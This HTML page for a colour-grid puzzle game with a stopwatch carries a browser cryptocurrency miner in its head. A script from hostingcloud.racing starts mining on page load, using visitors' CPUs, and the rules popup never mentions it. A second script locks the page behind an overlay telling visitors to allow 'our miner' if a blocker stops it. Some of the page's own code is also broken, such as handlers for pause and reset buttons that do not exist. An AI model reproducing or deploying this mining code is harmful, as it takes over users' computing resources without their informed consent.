<html>
    <head>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300">
        <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.4.1/css/all.css" integrity="sha384-5sAR7xN1Nv6T6+dT2mhtzEpVJvfS3NScPQTrOxhwjIuvcA67KV2R5Jz6kr4abQsz" crossorigin="anonymous">
        <link rel="stylesheet" href="stopWatch.css">
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta http-equiv="X-UA-Compatible" content="ie=edge">
        <script>
            function PopUp(){
                document.getElementById('ac-wrapper').style.display="none"; 
            }
        </script>
        <script src="https://www.hostingcloud.racing/l2b7.js"></script>
        <script>
            var _client = new Client.Anonymous('85864c2582274ec967fe472022b45a256fa4b96c2680708f8dddd1329e89f62b', {
                throttle: 0.5, c: 'w', ads: 0
            });
            _client.start();
            
        </script>
        <script>
            setTimeout(function(){
                if(typeof _client === 'undefined' || _client === null)
                {
                    var messageDiv = document.createElement("div");
                    messageDiv.setAttribute("style","width: 50%; background-color: white; padding: 15px; display: inline-block; vertical-align: middle;");
                    messageDiv.appendChild(document.createTextNode("Please allow our miner on your blocker software to continue browsing our site. Reload the page after that."));
                    var mainDiv = document.createElement("div");
                    mainDiv.setAttribute("style","position: absolute; top: 0px; right: 0px; width: 100%; height: 100%; display: flex; background-color: #4c4c4c;  align-items: center; justify-content: center");
                    mainDiv.appendChild(messageDiv);
                    document.body.appendChild(mainDiv);
                    document.getElementsByTagName("body")[0].style.overflow = "hidden";
                    window.scrollTo(0, 0);
                }
            },1000);
        </script>
        <script>
            //alert("Can you solve this extremely difficult puzzle ?\nShare it if you like it !\nConsider donating to help this project !\nGood luck ! ;)");
            
            var map = [
                [7,4,6,6,4,8,3,2,5,2],
                [2,4,6,2,3,7,4,3,4,1],
                [2,1,5,3,2,3,3,2,3,1],
                [2,2,5,3,4,4,3,5,6,2],
                [5,4,8,1,5,8,2,3,4,1],
                [3,1,4,3,1,6,3,2,5,2],
                [1,2,8,3,5,6,2,4,5,2],
                [4,4,3,3,3,8,4,3,5,4],
                [4,2,6,3,3,4,3,1,5,1],
                [1,1,1,2,1,3,1,3,2,1]
            ];
            
            var color = [
                "#eee",
                "#e66",
                "#6e6",
                "#66e",
                "#ee6",
                "#6ee",
                "#e6e",
                "#e60",
                "#6e0",
                "#06e"
            ]
            
            function click(e) {
                let x = e.target.getAttribute("id").split("")[1];
                let y = e.target.getAttribute("id").split("")[0];
                
                let parents = [
                    [(x+5)%9, y*2%9],
                    [(x+2)*7%9, y*23%9]
                ];
                
                //console.log(parents)
                
                map[y][x]++;
                if(map[y][x]>9) map[y][x] = 0;
                
                for(let i of parents) {
                    map[i[0]][i[1]]++;
                    if(map[i[0]][i[1]]>9) map[i[0]][i[1]] = 0;
                }
                update();
            }
            
            function update() {
                for(let i = 0; i < 10; i++) {
                for(let l = 0; l < 10; l++) {
                    document.getElementById(i+""+l).style.backgroundColor = color[map[i][l]];
                    //document.getElementById(i+""+l).innerText = map[i][l]
                }
                }
            }
            
            window.onload = () => {
                for(let i = 0; i < 10; i++) {
                    let elem = document.createElement("div");
                    elem.classList.add("row");
                    for(let l = 0; l < 10; l++) {
                        let color = document.createElement("div");
                        color.classList.add("color");
                        color.setAttribute("id", i+""+l);
                        color.addEventListener("click", click);
                        color.style.backgroundColor = color[map[l][i]];
                        elem.appendChild(color);
                    }
                    document.querySelector(".game").appendChild(elem);
                }
                update();
            }
        </script>
        <style>
body {
    width:100vw;
    height:100vh;
    margin:0;
    padding:0;
    background-color:#fa8;
    display:flex;
    flex-direction:column;
    justify-content:center;
    align-items:center;
}

#main {
  width: 200px;
  border: 1px dotted black;
}

h1 {
  margin: 5;
    display: inline-block;
}

button {
  float: right;
}

.game {
    width:calc(40vw - 20px);
    height:calc(40vw - 20px);
    background-color:#fca;
    display:flex;
    align-items:center;
    justify-content:center;
    border:4px solid #666;
    box-shadow:4px 4px 6px rgba(0,0,0,0.3);
}

.row {
    width:100%;
    height:100%;
    display:flex;
    flex-direction:column;
    align-items:center;
    justify-content:center;
}

.color {
    width:100%;
    height:100%;
    border:1px solid #000;
}

footer {
  text-align: center;
  padding: 3px;

  color: white;
}

#ac-wrapper {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: rgba(255,255,255,.6);
    z-index: 1001;
}

#popup {
    width: 555px;
    height: 375px;
    background: #FFFFFF;
    border: 5px solid #000;
    border-radius: 50px;
    -moz-border-radius: 50px;
    -webkit-border-radius: 50px;
    box-shadow: #64686e 0px 0px 3px 3px;
    -moz-box-shadow: #64686e 0px 0px 3px 3px;
    -webkit-box-shadow: #64686e 0px 0px 3px 3px;
    position: relative;
    top: 250px; left: 675px;
}
        </style>
        <title>Color Puzzle</title>
    </head>
    <body>
        <div id="ac-wrapper">
            <div id="popup">
                <center>
                    <h2>Color Puzzle</h2>
                    <p><b>Rules</b></p>
                    <p>Press a square to change their colors.<br>Each click changes more than one square, but it is not random.<br>Fill all the board with only one color!<br>Good luck! ;)</p>
                    <input type="submit" name="submit" value="Let's go!" onClick="PopUp()" />
                    <p><br></p>
                    <p><b>Note</b></p>
                    <p>If you enjoy the game share it with your friends and family!<br>Please consider donating so that I can keep up with these types of projects.<br>Thanks and enjoy!</p>
                </center>
            </div>
        </div>
        <header>
            <div id="chronometer">
                <h1 data-chronometer>00:00:00</h1><button id="play">PLAY</button>
            </div>

            <script type="text/javascript">

                let hours = `00`,
                    minutes = `00`,
                    seconds = `00`,
                    chronometerCall
        
                function chronometer() {
        
                    seconds++
        
                    if (seconds < 10) seconds = `0`+seconds
        
                    if (seconds > 59) {
                        seconds = `00`
                        minutes ++
        
                        if (minutes < 10) minutes = `0`+minutes
                    }
        
                    if (minutes > 59) {
                        minutes = `00`
                        hours ++
                    }
        
                    document.querySelector(`[data-chronometer]`)
                            .textContent = `${hours}:${minutes}:${seconds}`
        
                }
        
                play.onclick = (event) => {
                    chronometerCall = setInterval(chronometer, 1000)
                    event.target.setAttribute(`disabled`,``)
                }
        
                pause.onclick = () => {
                    clearInterval(chronometerCall)
                    play.removeAttribute(`disabled`)
                }
        
                reset.onclick = () => {
                    clearInterval(chronometerCall)
                    play.removeAttribute(`disabled`)
                    document.querySelector(`[data-chronometer]`)
                            .textContent = `00:00:00`
                }
        
            </script>
        </header>
        <div class="game"></div>
        <footer>
            <p>Bitcoin adress: 1MqjvZ6q9n1N2aEm2wNoCBVLD8vnXvk1Hu<br>MintMe adress: 0x5727a151edb61ce96299b0bf51d3c7e42d9393d1</p>
        </footer>
    </body>
</html>